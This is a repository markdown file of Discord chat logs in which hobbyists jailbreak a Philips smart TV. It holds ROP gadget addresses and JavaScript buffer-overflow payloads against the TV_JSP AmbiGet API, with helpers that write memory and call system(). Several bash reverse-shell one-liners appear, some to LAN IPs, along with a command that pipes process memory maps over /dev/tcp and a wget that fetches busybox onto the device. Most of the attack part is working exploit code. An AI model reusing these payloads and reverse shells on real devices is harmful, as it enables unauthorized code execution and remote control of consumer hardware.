Sunpy/Philips_TV
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
master
Philips_TV/files/28_apr_2020/discord.md

10 KiB
Raw Permalink Blame History

Discord messages of interest

Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.

ok so I found some stuff :^)

// looks relatively safe to call (crashes with a 1 deref in strstr)
PC = 0x23BCC
R4 = address+0x880
R11 = data

// system call (SP buffer)
PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer)
R4 = R11 = unused

// system call (R4 buffer)
// looks super safe
PC = 0x11D48 or 0x14108
R4 = address of ascii string for system()
R11 = unused

// system call (R4 buffer) but probably unsafe
PC = 0x2F3DC (super unsafe) or 0x2F52C
R4 = address of ascii string for system()
R11 = unused

these are the useful gadgets
there seems to be a memory area that stays static between runs, and is in a good address range
thus it might be possible to use the write primitive to write a buffer for system there
@Jan4V#0289

You will still have to catch me up with what I should do though xd
@Emily | Sunpy#5213

can you send me the js you have for the AmbiGet?
I wanna make a nicer setup for this and we can try
@Jan4V#0289

new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
    "     >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
)

@Emily | Sunpy#5213

File: exploit.js (1.72 KB)
this is the general idea
but I wouldn't run this whole thing at first
if/when you wanna mess with this mention me and I'll jump into voice
@Jan4V#0289

/dev/shm/shm_tmp/fusion.0.1
@Jan4V#0289

File: crashdump (6.03 MB)
@Emily | Sunpy#5213

File: crashdump (181.60 KB)
@Emily | Sunpy#5213

function executeShellcode(shellcode) {
    var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    payload += encodeInt(0x41414141);
    payload += encodeInt(0x42424242);
    payload += encodeInt(0x9EBA0404);
    for(let i = 0; i < 4194304; i++)
    {
        payload += encodeInt(0xE0A15005);
    }
    payload += shellcode;
    new TV_JSP().tvServices.AmbiGet(0, payload);
}

@Jan4V#0289

http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/
@Emily | Sunpy#5213

http://shell-storm.org/shellcode/files/shellcode-730.php
@Jan4V#0289

btw "a".repeat(123) is a thing
@HoLLy#2750

function executeShellcode(shellcode) {
    var payload = "A".repeat(1036);
    payload += encodeInt(0x41414141);
    payload += encodeInt(0x42424242);
    payload += encodeInt(0x9EBA0404);
    for(let i = 0; i < 0x400000; i++)
    {
        payload += encodeInt(0xE0A15005);
    }
    payload += shellcode;
    new TV_JSP().tvServices.AmbiGet(0, payload);
}

executeShellcode(encodeInt(0xEF91337B));

@Jan4V#0289

File: crashdump (124.31 KB)
@Emily | Sunpy#5213

function encodeInt(input) {
    return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
}
function executeCommand(command) {
    var payload = "A"*1036;
    payload += encodeInt(0x01011D48);
    payload += encodeInt(0x42424242);
    payload += encodeInt(0x9EBA0404);
    for(let i = 0; i < 0x400000; i++)
    {
        payload += encodeInt(0xE0A15005);
    }
    payload += encodeInt(0xE2444401);
    payload += encodeInt(0xE1A0B004);
    payload += encodeInt(0xE28F4008);
    payload += encodeInt(0xE1A0F00B);
    payload += encodeInt(0x41414141);
    payload += encodeInt(0x42424242);
    payload += command;
    new TV_JSP().tvServices.AmbiGet(0, payload);
}

executeCommand("touch /tmp/jan4v.txt");

@Jan4V#0289

File: crashdump (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to timestamp)
@Emily | Sunpy#5213

/dev/shm/shm_tmp/fusion.0.1
@Jan4V#0289

File: crashdump (6.03 MB)
@Emily | Sunpy#5213

File: crashdump (167.34 KB)
@Emily | Sunpy#5213

function encodeInt(input) {
    return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
}

function execute(pc, r4, r11) {
    var payload = "A".repeat(1040);
    payload += encodeInt(r4);
    payload += encodeInt(r11);
    payload += encodeInt(pc);
    new TV_JSP().tvServices.AmbiGet(0, payload);
}

function writeMemory4(address, data)
{
    execute(0x23BCC, address + 0x880, data);
}

function callSystem(address)
{
    execute(0x11D48, address, 0x41414141);    
}

writeMemory4(0x8a55f040, 0x7478742E);

@Jan4V#0289

I mean you could already pwn the browser
I believe
so you could make it display any web page
and we can read/write a bunch of files on the fs
but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^)
@HoLLy#2750

We couldn't overwrite the scripts though
@Shaddy#4422

when I say "we" I basically mean an
we tried like 1 script lol
@HoLLy#2750

we dont have permissions to write to the file
we only have permissions to tmp
@Emily | Sunpy#5213

there's multiple places that get executed
probably more places too though
@HoLLy#2750

We've tried multiple places
@Shaddy#4422

if there's a file/folder with incorrect permissions
@HoLLy#2750

That's the less exciting exploit anyway :^)
@Shaddy#4422

I tried to look for a script that may be in tmp that gets executed as the people doesnt seem to be consistent
but couldnt find any
we have permissions to /3rd_rw aswell
@Emily | Sunpy#5213

im going to jump out the window
we can write commands to an ini file in read/write area
@Emily | Sunpy#5213

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
@Jan4V#0289

@Emily | Sunpy#5213 ( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &
@HoLLy#2750

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
@HoLLy#2750

( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &
@Emily | Sunpy#5213

( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &
@Jan4V#0289

File: crashdump (268.85 KB)
@Emily | Sunpy#5213

Terminal-tmux
@HoLLy#2750

function encodeInt(input) {
    return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
}

function execute(pc, r4, r11) {
    var payload = "A".repeat(1040);
    payload += encodeInt(r4);
    payload += encodeInt(r11);
    payload += encodeInt(pc);
    new TV_JSP().tvServices.AmbiGet(0, payload);
}

function callSystem(address)
{
    execute(0x11D48, address, 0x41414141);    
}

callSystem(0x9CF55588);

@Jan4V#0289

cmd - nc -nlvp 1337
@Emily | Sunpy#5213

/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l
openbox commands
@Jan4V#0289

mount -t devpts none /dev/pts
@Jan4V#0289

terminal
@Emily | Sunpy#5213

https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz
@Jan4V#0289

https://betacraft.pl/server-archive/minecraft/
@Jan4V#0289

https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz
@Jan4V#0289

LD_LIBRARY_PATH=/lib:/3rd_rw/server
https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz
@Jan4V#0289

minecraft server start
minecraft server still starting
@Emily | Sunpy#5213

569043771063ns loadtime :D
@Emily | Sunpy#5213

minecraft server running
@Emily | Sunpy#5213

AllowTcpForwarding remote  
AllowStreamLocalForwarding no  
GatewayPorts yes

@Jan4V#0289

minecraft code execution
- Holly
@Emily | Sunpy#5213